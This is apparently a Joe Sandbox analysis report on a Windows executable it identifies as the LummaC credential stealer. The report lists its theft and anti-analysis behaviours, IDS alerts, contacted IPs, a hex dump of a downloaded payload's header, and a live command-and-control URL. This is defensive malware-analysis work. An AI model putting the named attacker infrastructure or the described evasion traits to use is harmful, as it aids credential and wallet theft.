Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561566
MD5:acc594995958c5cf5f107fe27db38f8e
SHA1:92b6e9ee6a4a61b292883566738f8b7e038f5eb1
SHA256:2c3841d0070158d8f5824289380656aad74c190ddfd4ee8240eefbfd16988b89
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6908 cmdline: "C:\Users\user\Desktop\file.exe" MD5: ACC594995958C5CF5F107FE27DB38F8E)
    • chrome.exe (PID: 7680 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 --field-trial-handle=1908,i,3407012707208329137,12783355728101438977,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1932,i,12659663742680586460,29782516825973807,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 6908JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 6908JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T19:52:17.270597+010020283713Unknown Traffic192.168.2.749701104.21.33.116443TCP
        2024-11-23T19:52:19.948553+010020283713Unknown Traffic192.168.2.749703104.21.33.116443TCP
        2024-11-23T19:52:22.423255+010020283713Unknown Traffic192.168.2.749709104.21.33.116443TCP
        2024-11-23T19:52:25.083557+010020283713Unknown Traffic192.168.2.749715104.21.33.116443TCP
        2024-11-23T19:52:27.647335+010020283713Unknown Traffic192.168.2.749721104.21.33.116443TCP
        2024-11-23T19:52:30.272836+010020283713Unknown Traffic192.168.2.749728104.21.33.116443TCP
        2024-11-23T19:52:34.074667+010020283713Unknown Traffic192.168.2.749737104.21.33.116443TCP
        2024-11-23T19:52:42.278433+010020283713Unknown Traffic192.168.2.749754104.21.33.116443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T19:52:17.959832+010020546531A Network Trojan was detected192.168.2.749701104.21.33.116443TCP
        2024-11-23T19:52:20.719769+010020546531A Network Trojan was detected192.168.2.749703104.21.33.116443TCP
        2024-11-23T19:52:43.039423+010020546531A Network Trojan was detected192.168.2.749754104.21.33.116443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T19:52:17.959832+010020498361A Network Trojan was detected192.168.2.749701104.21.33.116443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T19:52:20.719769+010020498121A Network Trojan was detected192.168.2.749703104.21.33.116443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T19:52:44.613890+010020197142Potentially Bad Traffic192.168.2.749760185.215.113.1680TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-23T19:52:25.990570+010020480941Malware Command and Control Activity Detected192.168.2.749715104.21.33.116443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: file.exeAvira: detected
        Source: file.exe.6908.3.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
        Source: file.exeReversingLabs: Detection: 44%
        Source: file.exeJoe Sandbox ML: detected
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49703 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.7:49812 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.7:49818 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49873 version: TLS 1.2
        Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000003.00000002.1737168672.0000000005D12000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1650571143.0000000007C70000.00000004.00001000.00020000.00000000.sdmp

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49701 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49703 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49703 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49715 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49754 -> 104.21.33.116:443
        Source: Malware configuration extractorURLs: https://property-imper.sbs/api
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 18:52:44 GMTContent-Type: application/octet-streamContent-Length: 2801152Last-Modified: Sat, 23 Nov 2024 18:36:55 GMTConnection: keep-aliveETag: "674220c7-2abe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 63 3a 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 62 71 6b 66 6f 65 6d 76 00 60 2a 00 00 a0 00 00 00 5e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 74 69 66 6a 64 6d 68 00 20 00 00 00 00 2b 00 00 04 00 00 00 98 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 9c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
        Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49721 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49737 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49760 -> 185.215.113.16:80
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49754 -> 104.21.33.116:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49728 -> 104.21.33.116:443
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uOAVrAAkXHMSHAx&MD=G22mkc+C HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
